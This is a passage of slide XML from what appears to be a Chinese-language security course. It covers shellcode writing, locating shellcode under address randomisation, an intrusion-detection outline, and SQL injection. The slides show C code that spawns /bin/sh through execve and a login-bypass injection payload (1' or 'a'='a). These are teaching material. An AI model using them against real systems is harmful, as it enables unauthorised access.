            <a:ext cx="584835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F6D2E763-49A3-4B0A-A1B3-941D585A6AD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编写示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894DF151-489A-46DB-AF5B-24CBDE3E667F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="2205038"/>
            <a:ext cx="849630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4000"/>
              <a:t>#include void main() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>	char *name[2]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>	name[0] = "/bin/sh"; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>	name[1] = NULL; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>	execve(name[0], name, NULL); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="400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F663FE2C-A4C0-4193-AB2C-05659F46A5D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编写示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32771" name="Picture 2" descr="http://blog.nsfocus.net/wp-content/uploads/2017/06/9b903dc15c2012fe445257c85623ccea.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4865D585-BF4A-43D5-8310-AD9129A9F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3" y="2767013"/>
            <a:ext cx="7864475"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矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB737F58-E1C1-491C-ABDC-37F313279A13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="647700" y="2000250"/>
            <a:ext cx="84963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4000"/>
              <a:t>反编译</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2A093701-8BA8-435D-8A76-31FD992521B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编写示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34819" name="Picture 2" descr="http://blog.nsfocus.net/wp-content/uploads/2017/06/6c87cb0618a6a78195a1d6900a285aed.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8FA7C0D-0FE3-4E92-9B80-B724E2D87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205038"/>
            <a:ext cx="7424738"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3E1ACAB2-C117-4BBB-A22D-F2EE9670405F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编写示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E06308A-F32A-4790-A68A-DE9D9D3FD869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="647700" y="2000250"/>
            <a:ext cx="84963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4000"/>
              <a:t>依据反编译结果直接写汇编程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36868" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{029AF26C-066A-421E-862C-9ED0A62526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2765425"/>
            <a:ext cx="6911975" cy="409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F8B7A726-5F90-4E43-9D24-84493DDEBABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C7F739-C34F-48C4-9A33-8FC4C4B32DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="447675" y="2276475"/>
            <a:ext cx="84963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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>恶意代码是放在输入中的，所以可以知道它在目标缓冲区内的相对位置。如果已知缓冲区的起始地址，就可以计算出恶意代码的具体位置。</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{874E2A31-1A4A-4B42-9D1D-11198F30E6FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4657AE63-6141-4B1C-A24A-E7FD3FBC7592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323850" y="2319338"/>
            <a:ext cx="8496300" cy="1810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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>但是，现代操作系统采用内存地址随机化，并不知道缓冲区的起始地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E084D8F9-8F4B-46CF-B987-E0C2FEA96E2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3408363" y="4566567"/>
            <a:ext cx="4259262"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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>因此，主要靠猜！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="236546" name="Picture 2" descr="哭脸表情图片-哭脸表情素材-哭脸表情插画-摄图新视界">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69E0F5F5-85F1-42EE-AFCA-7E35C7187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436392"/>
            <a:ext cx="1512887"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236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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFAE91DD-68DC-4FCD-B728-3925D87F19EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4550FB8-76B0-446F-AFCB-EDF6461BA8C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323850" y="2060575"/>
            <a:ext cx="849630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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>所以，发现漏洞、编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>、确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>的地址是一件技术含量很高的事情</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A522A1A-454D-4436-B8BE-9996D5606426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3103563" y="5132388"/>
            <a:ext cx="43481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lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>有大量辅助工具！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="AutoShape 4" descr="只准百姓点灯: '重拾'笑脸">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB1E8A5-484A-4E24-802A-B06D4CF5AC8B}"/>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en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F640B5B3-AF12-4A31-BEFF-E6C8E82F1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5108575"/>
            <a:ext cx="1217613"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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE83558B-B299-4B2B-8C37-4E3FB67312BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258888" y="1841500"/>
            <a:ext cx="6934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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   入侵方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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入侵检测概述</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入侵检测方法与基本原理</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入侵检测响应机制</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入侵检测标准化工作</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口令管理</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D2B5B5A8-5B3A-419F-AED8-FCDE543AACE5}"/>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451A16BE-59B6-4955-AEEC-5E0CC4084DF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>方法二漏洞利用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>更多方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>登录页面是通过拼接字符串的方式构造动态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>语句，然后到数据库中校验用户名和密码是否存在，后台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>语句是？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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DA5BD63A-95F1-47C4-80CE-9603413334F5}"/>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04BCF4C0-A98C-443F-9274-02BD4BA3C98E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>方法二漏洞利用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>更多方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>select * from users where  user='&amp;username&amp;' and pass='&amp;password&amp;’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>若攻击者使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>作为用户名，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>1' or 'a'='a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>作为密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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6954AAA6-F167-49E0-8805-B817A6874353}"/>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774F6DE4-4836-4B91-93AB-874F2CEA9497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>方法二漏洞利用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>更多方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>select * from users where  user='&amp;username&amp;' and pass='&amp;password&amp;’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
